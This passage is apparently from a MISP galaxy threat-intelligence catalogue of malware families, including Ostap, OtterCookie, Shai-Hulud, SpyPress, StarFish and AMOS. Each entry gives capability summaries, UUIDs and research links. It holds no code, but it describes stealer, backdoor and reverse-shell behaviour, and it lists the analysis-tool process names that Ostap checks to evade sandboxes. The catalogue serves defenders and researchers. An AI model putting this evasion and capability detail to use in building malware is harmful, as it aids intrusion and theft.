- https://thehackernews.com/2024/06/moreeggs-malware-disguised-as-resumes.html - webarchive
- https://arcticwolf.com/resources/blog/venom-spider-uses-server-side-polymorphism-to-weave-a-web-around-victims/ - webarchive
- https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ - webarchive
- https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/ - webarchive
- https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1 - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers - webarchive
- https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish - webarchive
- https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw - webarchive
- https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware - webarchive
- https://denwp.com/more-eggs-venom-spider-phishing-campaign/ - webarchive
- https://blog.morphisec.com/cobalt-gang-2.0 - webarchive
- https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire - webarchive
- https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing - webarchive
- https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/ - webarchive
- https://www.esentire.com/web-native-pages/unmasking-venom-spider - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta4557-targets-recruiters-directly-email - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/ - webarchive
- https://twitter.com/Arkbird_SOLG/status/1301536930069278727 - webarchive
- https://asert.arbornetworks.com/double-the-infection-double-the-fun/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NanHaiShu
NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.
Internal MISP references
UUID 3e46af39-52e8-442f-aff1-38eeb90336fc which can be used as unique global reference for NanHaiShu in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu - webarchive
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets - webarchive
- https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering - webarchive
- https://attack.mitre.org/software/S0228/ - webarchive
- https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
NodeRAT
Internal MISP references
UUID e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed which can be used as unique global reference for NodeRAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat - webarchive
- https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OFFODE
According to the author, this is a project intended to give an understanding of bypassing Multi-Factor Authentication (MFA) on an Outlook account. It is built in Node.js and uses Playwright for the automation in the backend.
Internal MISP references
UUID 0be6d248-382a-48b8-9a52-dba08aaa891e which can be used as unique global reference for OFFODE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ostap
Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:
AgentSimulator.exe, anti-virus.EXE, BehaviorDumper, BennyDB.exe, ctfmon.exe, fakepos_bin, FrzState2k, gemu-ga.exe (possibly a misspelling of qemu-ga.exe, the QEMU hypervisor's guest agent), ImmunityDebugger.exe, KMS Server Service.exe, ProcessHacker, procexp, Proxifier.exe, python, tcpdump, VBoxService, VBoxTray.exe, VmRemoteGuest, vmtoolsd, VMware2B.exe, VzService.exe, winace, Wireshark
If a blacklisted process is found, the malware terminates.
Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.
Internal MISP references
UUID a3b93781-c51c-4ccb-a856-804331470a9d which can be used as unique global reference for ostap in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/ - webarchive
- https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/ - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://www.intrinsec.com/deobfuscating-hunting-ostap/ - webarchive
- https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/ - webarchive
- https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py - webarchive
- https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OtterCandy
OtterCandy is a modular JavaScript backdoor that combines features from earlier malware families such as OtterCookie and RATatouille (aka INVISIBLEFERRET.JAVASCRIPT). It steals sensitive information including browser credentials and cryptocurrency wallet data, and can execute commands such as uploading files, changing directories and self-termination. The malware communicates via the socket.io protocol over port 5000 to receive and execute commands from the attackers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OtterCandy.
| Known Synonyms |
|---|
| HardHatRAT |
| UNSEENMINK |
Internal MISP references
UUID 5488cddb-15e1-489e-b8a7-c030dc459162 which can be used as unique global reference for OtterCandy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
OtterCookie
Internal MISP references
UUID 71fac887-6d86-4f95-99f1-300e2e6caaf6 which can be used as unique global reference for OtterCookie in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.otter_cookie - webarchive
- https://jp.security.ntt/tech_blog/contagious-interview-ottercookie - webarchive
- https://jp.security.ntt/insights_resources/tech_blog/en-contagious-interview-ottercookie/ - webarchive
- https://gbhackers.com/lazarus-group-malware-with-ottercookie/ - webarchive
- https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview - webarchive
- https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/ - webarchive
- https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263 - webarchive
- https://blog.talosintelligence.com/beavertail-and-ottercookie/ - webarchive
- https://jp.security.ntt/tech_blog/en-waterplum-ottercookie - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/DeceptiveDevelopment-and-North-Korean-IT-workers-from-primitive-crypto-theft-to-sophisticated-AI-based-deception.pdf - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-from-primitive-crypto-theft-to-sophisticated-ai-based-deception/ - webarchive
- https://www.silentpush.com/blog/contagious-interview-front-companies/ - webarchive
- https://www-cdn.anthropic.com/b2a76c6f6992465c09a6f2fce282f6c0cea8c200.pdf - webarchive
- https://www.recordedfuture.com/research/inside-the-scam-north-koreas-it-worker-threat - webarchive
- https://quetzal.bitso.com/p/interview-with-the-chollima - webarchive
- https://blackpointcyber.com/blog/malicious-node-package-deploys-ottercookie/ - webarchive
- https://any.run/cybersecurity-blog/ottercookie-malware-analysis/ - webarchive
- https://blog.nviso.eu/2025/11/13/contagious-interview-actors-now-utilize-json-storage-services-for-malware-delivery/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ParaSiteSnatcher
Internal MISP references
UUID 9af9557c-04fc-4231-85c4-d1fb30c53cb6 which can be used as unique global reference for ParaSiteSnatcher in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Parrot TDS
This malicious code written in JavaScript is used as a Traffic Direction System (TDS). The TDS shows similarities to the Prometheus TDS. According to Avast's Decoded blog, this TDS has been active since October 2021.
Internal MISP references
UUID dbefad0a-29d3-49d3-b925-116598182dee which can be used as unique global reference for Parrot TDS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.parrot_tds - webarchive
- https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/ - webarchive
- https://www.silentpush.com/blog/socgholish/ - webarchive
- https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PeaceNotWar
PeaceNotWar was integrated into the Node.js module node-ipc as a piece of malware/protestware with wiper characteristics. It targets machines with a public IP address located in Russia or Belarus (determined via geolocation) and recursively overwrites files with a heart emoji.
Internal MISP references
UUID 6c304481-024e-4f34-af06-6235edacfdcc which can be used as unique global reference for PeaceNotWar in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar - webarchive
- https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/ - webarchive
- https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers - webarchive
- https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PindOS
Internal MISP references
UUID 6af1eb7a-bc54-43af-9e15-7187a5f250c4 which can be used as unique global reference for PindOS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Powmet
Internal MISP references
UUID 9521ceb0-039d-412c-a38b-7bd9ddfc772e which can be used as unique global reference for Powmet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QNodeService
According to Trend Micro, this is Node.js-based malware that can download, upload and execute files, steal credentials from the Chrome and Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32-bit and 64-bit systems.
Internal MISP references
UUID 52d9260f-f090-4e79-b0b3-0c89f5db6bc6 which can be used as unique global reference for QNodeService in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QUICKCAFE
QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.
Internal MISP references
UUID 475766d2-1e99-4d81-89e4-0d0df4a562d0 which can be used as unique global reference for QUICKCAFE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RunForestRun
Active around 2012-2013, this family deployed small JavaScript snippets on infected websites to load exploit kit scripts from DGA-generated domains. It commonly used the Blackhole exploit kit and the Sutra Traffic Distribution System (TDS), which caused it to sometimes be misnamed as Blackhole or Sutra.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RunForestRun.
| Known Synonyms |
|---|
| Blackhole |
| Sutra |
Internal MISP references
UUID 1a88e348-e92e-4e88-b32a-38c5dbc3f70a which can be used as unique global reference for RunForestRun in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.runforestrun - webarchive
- https://web.archive.org/web/20150613014503/https://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/ - webarchive
- https://malware.dontneedcoffee.com/2012/12/eyeglanceru.html - webarchive
- https://blog.malwaremustdie.org/2013/11/runforrestrun-dga-is-alive-at.html - webarchive
- https://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md - webarchive
- https://www.shadowserver.org/news/beware-the-trolls-secure-your-trackers/ - webarchive
- https://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php/pseudo-random-domains.html - webarchive
- https://securelist.com/runforestrun-gootkit-and-random-domain-name-generation/57865/ - webarchive
- https://blog.malwaremustdie.org/2012/10/fuzzy-in-manual-cracking-of.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
s1ngularity Stealer
According to StepSecurity, this is a stealer deployed through a compromised Nx package, targeting system environment properties, cryptocurrency wallets, and development credentials. Data is exfiltrated to Github using stolen tokens.
Internal MISP references
UUID 3f4f13e1-6c9e-4b5f-9481-28d6d423ee24 which can be used as unique global reference for s1ngularity Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
scanbox
Internal MISP references
UUID 0a13a546-91a2-4de0-9bbb-71c9233ce6fa which can be used as unique global reference for scanbox in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox - webarchive
- https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/ - webarchive
- http://resources.infosecinstitute.com/scanbox-framework/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global - webarchive
- https://nattothoughts.substack.com/p/reconnaissance-scanning-tools-used - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/ - webarchive
- https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Shai-Hulud
A Javascript-based worm propagating through GitHub repositories and exfiltrating tokens and other credentials.
Internal MISP references
UUID 7ca06f21-399b-4b99-b0ac-787643c21ec0 which can be used as unique global reference for Shai-Hulud in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.shai_hulud - webarchive
- https://www.wiz.io/blog/shai-hulud-npm-supply-chain-attack - webarchive
- https://www.reversinglabs.com/blog/shai-hulud-worm-npm - webarchive
- https://www.zscaler.com/blogs/security-research/mitigating-risks-shai-hulud-npm-worm - webarchive
- https://www.zscaler.com/blogs/security-research/shai-hulud-v2-poses-risk-npm-supply-chain - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpyPress
According to ESET, SpyPress is a set of Javascript payloads targeting different webmail frameworks (HORDE, MDAEMON, ROUNDCUBE, ZIMBRA). The observed payloads have common characteristics. All are similarly obfuscated, with variable and function names replaced with random-looking strings. Furthermore, strings used by the code, such as webmail and C&C server URLs, are also obfuscated and contained in an encrypted list. Each of those strings is only decrypted when it is used. Note that the variable and function names are randomized for each sample, so the final SpyPress payloads will have different hashes. Another common characteristic is that there are no persistence or update mechanisms. The payload is fully contained in the email and only executed when the email message is viewed from a vulnerable webmail instance.
Finally, all payloads communicate with their hardcoded C&C servers via HTTP POST requests. There is a small number of C&C servers that are shared by all payloads (there is no separation by victim or payload type).
Internal MISP references
UUID 6a74d86a-af26-4dd3-96fa-71e248288d54 which can be used as unique global reference for SpyPress in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SQLRat
SQLRat campaigns typically involve a lure document that includes an image overlaid by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.
Internal MISP references
UUID d51cb8f8-cca3-46ce-a05d-052df44aef40 which can be used as unique global reference for SQLRat in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Starfighter (Javascript)
According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.
Internal MISP references
UUID f6c80748-1cce-4f6b-92e9-f8a04ff3464a which can be used as unique global reference for Starfighter (Javascript) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
StarFish
According to IBM X-Force, this is a simple reverse shell. Upon execution, the script generates a unique victim ID by combining the machine's product ID and computer name. It queries a hardcoded server and executes optional commands directly via cmd.exe. Command output is sent back using a POST request after completion or a timeout.
Internal MISP references
UUID d150ed7e-a2a0-4a63-9c71-6b01c6974e53 which can be used as unique global reference for StarFish in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Swid
Internal MISP references
UUID d4be22cf-497d-46a0-8d57-30d10d9486e3 which can be used as unique global reference for Swid in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HTML5 Encoding
Internal MISP references
UUID c7ab9e5a-0ec9-481e-95ec-ad08f06cf985 which can be used as unique global reference for HTML5 Encoding in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext - webarchive
- https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/ - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Maintools.js
Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.
Internal MISP references
UUID 218f8ca8-1124-4e44-8fbd-4b05b46bde4b which can be used as unique global reference for Maintools.js in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 001 (APT32 Profiler)
Internal MISP references
UUID f2b0ffdc-7d4e-4786-8935-e7036faa174d which can be used as unique global reference for Unidentified JS 001 (APT32 Profiler) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 003 (Emotet Downloader)
According to Max Kersten, Emotet is dropped by a procedure spanning multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.
Internal MISP references
UUID 7bf28be0-3153-474d-8df7-e12fec511d7e which can be used as unique global reference for Unidentified JS 003 (Emotet Downloader) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 004
A simple loader written in JavaScript found by Marco Ramilli.
Internal MISP references
UUID a15e7c49-4eb6-46f0-8f79-0b765d7d4e46 which can be used as unique global reference for Unidentified JS 004 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 005 (Stealer)
Internal MISP references
UUID a797e9b9-cb3f-484a-9273-ac73e9ea1e06 which can be used as unique global reference for Unidentified JS 005 (Stealer) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 006 (Winter Wyvern)
A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.
Internal MISP references
UUID 547fed09-38d0-4813-b9b0-870a1d4136df which can be used as unique global reference for Unidentified JS 006 (Winter Wyvern) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified JS 002
Internal MISP references
UUID 7144063f-966b-4277-b316-00eb970ccd52 which can be used as unique global reference for Unidentified JS 002 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Valak
According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).
Research shows that Valak is distributed through spam campaigns; however, in some cases, it infiltrates systems that are already infected with a malicious program such as Ursnif (also known as Gozi).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Valak.
| Known Synonyms |
|---|
| Valek |
Internal MISP references
UUID b37b4d91-0ac7-48f5-8fd1-5237b9615cf7 which can be used as unique global reference for Valak in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.valak - webarchive
- https://www.cybereason.com/blog/valak-more-than-meets-the-eye - webarchive
- https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/ - webarchive
- https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7 - webarchive
- https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive
- https://twitter.com/malware_traffic/status/1207824548021886977 - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://unit42.paloaltonetworks.com/valak-evolution/ - webarchive
- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/monsterlibra/ - webarchive
- https://security-soup.net/analysis-of-valak-maldoc/ - webarchive
- https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
js.wd
The threat actor of this family compromised Chrome extension developer accounts and attached malicious code to the extensions. Web Developer 0.4.9, Chrometana 1.1.3, Infinity New Tab 3.12.3, CopyFish 2.8.5, Web Paint 1.2.1, and Social Fixer 20.1.1 were affected by this. TouchVPN and BetterVPN were assumed to be targets as well.
This led to the execution of another JavaScript that substitutes ad banners for their own, effectively hijacking ad traffic. It is also reported that fake pop-up alerts were used to lure victims into downloading possibly other malware.
Internal MISP references
UUID 62888aea-30b0-47f6-a7bf-1aa758f342fc which can be used as unique global reference for js.wd in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WEEVILPROXY
WEEVILPROXY is a sophisticated and featureful stealer which has a payload primarily written in NodeJS. The developer has put in concerted effort to develop the malware’s breadth of capabilities, including novel techniques not observed in any prior malware campaigns - to our knowledge. These new TTPs include methods to modify Windows Setup and Windows Recovery to enable long-term persistence, as well as methods to patch browser extensions ‘on the fly’.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WEEVILPROXY.
| Known Synonyms |
|---|
| JSCEAL |
Internal MISP references
UUID e715f9ad-58e7-4f5b-820e-dcb6937b6781 which can be used as unique global reference for WEEVILPROXY in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
witchcoven
Internal MISP references
UUID dcc0fad2-29a9-4b69-9d75-d288ca458bc7 which can be used as unique global reference for witchcoven in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Godzilla Webshell
Internal MISP references
UUID 07e88ccf-6027-412b-99bf-0fa1d3cfb174 which can be used as unique global reference for Godzilla Webshell in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell - webarchive
- https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ - webarchive
- https://harfanglab.io/insidethelab/insights-ivanti-csa-exploitation/ - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://blog.gigamon.com/2022/09/28/investigating-web-shells/ - webarchive
- https://www.trendmicro.com/en_us/research/25/c/the-espionage-toolkit-of-earth-alux.html - webarchive
- https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Icesword
webshell
Internal MISP references
UUID f7b724e9-2584-4da8-b0c1-a6d9f4a8018e which can be used as unique global reference for Icesword in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
3CX Backdoor (OS X)
Internal MISP references
UUID d5e10bf9-9de8-46be-96d0-aa502b14ffe8 which can be used as unique global reference for 3CX Backdoor (OS X) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AMOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMOS.
| Known Synonyms |
|---|
| Atomic macOS Stealer |
Internal MISP references
UUID 2fa2be52-e44f-4998-bde7-c66cfb6f4521 which can be used as unique global reference for AMOS in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos - webarchive
- https://spycloud.com/blog/reverse-engineering-atomic-macos-stealer/ - webarchive
- https://securelist.com/crimeware-report-fakesg-akira-amos/111483/ - webarchive
- https://www.sentinelone.com/blog/atomic-stealer-threat-actor-spawns-second-variant-of-macos-malware-sold-on-telegram/ - webarchive
- https://www.recordedfuture.com/the-travels-of-markopolo-self-proclaimed-meeting-software-vortax-spreads-infostealers - webarchive
- https://redcanary.com/blog/threat-intelligence/atomic-odyssey-poseidon-stealers/ - webarchive
- https://www.intrinsec.com/wp-content/uploads/2025/10/TLP-CLEAR-31072025-ShadowSyndicate-infrastructure-illumination-EN.pdf - webarchive
- https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/ - webarchive
- https://www.huntress.com/blog/amos-stealer-chatgpt-grok-ai-trust - webarchive
- https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version - webarchive
- https://www.malwarebytes.com/blog/news/2025/09/fake-malwarebytes-lastpass-and-others-on-github-serve-malware - webarchive
- https://hunt.io/blog/macos-odyssey-amos-malware-campaign - webarchive
- https://labs.k7computing.com/index.php/mentalpositives-new-macos-stealer-amos-repackaged-or-a-new-cyber-threat/ - webarchive
- https://redcanary.com/blog/threat-detection/atomic-stealer/ - webarchive
- https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219 - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising - webarchive
- https://www.kroll.com/en/publications/cyber/new-amos-infection-vector-highlights-risks-around-ai-adoption - webarchive
- https://denwp.com/amos-stealer-fud/ - webarchive
- https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AppleJeus (OS X)
According to PcRisk, AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.
Internal MISP references
UUID ca466f15-8e0a-4030-82cb-5382e3c56ee5 which can be used as unique global reference for AppleJeus (OS X) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-048a - webarchive
